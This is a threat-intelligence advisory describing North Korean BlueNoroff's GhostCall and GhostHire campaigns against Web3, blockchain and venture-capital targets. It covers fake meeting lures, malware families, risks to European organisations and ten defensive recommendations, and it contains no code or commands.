The GhostCall and GhostHire campaigns are part of a long-running operation named SnatchCrypto, conducted by the North Korean Lazarus Group sub-cluster BlueNoroff (also known as APT38 and other aliases). These campaigns focus on the Web3, blockchain, and venture capital sectors, targeting executives and developers primarily on macOS and Windows platforms. GhostCall employs social engineering via Telegram to invite targets to fake investment meetings conducted through phishing websites mimicking Zoom or Microsoft Teams. Victims experience a simulated live call with real recordings of other victims, followed by prompts to update the Zoom or Teams SDK. This triggers the download of malicious AppleScript or PowerShell scripts that install a suite of malware including DownTroy, which bypasses macOS security controls to steal passwords and install additional payloads. These payloads include backdoors such as CosmicDoor, RooTroy, and RealTimeTroy, capable of executing commands, exfiltrating data, and wiping files destructively. SilentSiphon, another component, harvests credentials and secrets from a wide array of cloud services, developer tools, and communication platforms, including GitHub, AWS, Azure, Kubernetes, and blockchain-related services. GhostHire targets Web3 developers by sending malicious coding assessments via Telegram bots, embedding malicious Go modules in GitHub repositories that trigger infection chains tailored to the victim’s OS. The campaigns have evolved from earlier efforts like RustBucket and leverage generative AI to accelerate malware development. The unified command-and-control infrastructure supports multi-OS payload delivery and persistent access. The campaigns have been observed since mid-2023 with infections confirmed in multiple countries, including European nations such as Italy, France, Spain, and Sweden. The threat actor’s sophisticated multi-stage infection chains, credential theft, and data exfiltration capabilities pose a serious threat to targeted organizations.

For European organizations, especially those involved in Web3, blockchain, venture capital, and technology sectors, these campaigns pose significant risks. The malware’s ability to steal credentials from password managers, cloud platforms, developer tools, and communication applications threatens confidentiality and intellectual property. Persistent backdoors enable long-term espionage, data exfiltration, and potential sabotage, impacting integrity and availability. The targeting of executives and developers increases the risk of supply chain compromises and insider threats. The use of social engineering and fake collaboration tools can lead to widespread infections within organizations. The campaigns’ multi-platform nature means both macOS and Windows environments are vulnerable, complicating defense efforts. The extensive data harvesting capabilities could lead to regulatory breaches under GDPR, resulting in legal and financial penalties. Additionally, the targeting of blockchain developers could undermine trust and security in emerging financial technologies critical to European digital economies.

European organizations should implement targeted defenses beyond generic advice: 1) Conduct focused security awareness training emphasizing the risks of social engineering via Telegram and fake collaboration platform updates. 2) Deploy application allowlisting and restrict execution of unsigned or unexpected scripts, especially AppleScript and PowerShell, to prevent malicious payload execution. 3) Monitor network traffic for unusual beaconing to external command-and-control servers associated with known BlueNoroff infrastructure. 4) Enforce multi-factor authentication and credential vaulting to reduce credential theft impact. 5) Implement strict controls on software development environments, including scanning dependencies for malicious modules and restricting GitHub repository execution. 6) Use endpoint detection and response (EDR) solutions capable of detecting behavior associated with DownTroy, CosmicDoor, and related malware families. 7) Regularly audit and monitor cloud service credentials and API keys for unauthorized access or exfiltration. 8) Collaborate with threat intelligence providers to stay updated on evolving BlueNoroff tactics and indicators of compromise. 9) Limit administrative privileges and require user consent for system password prompts, scrutinizing unexpected requests from collaboration tools. 10) Conduct penetration testing simulating these attack vectors to identify and remediate gaps.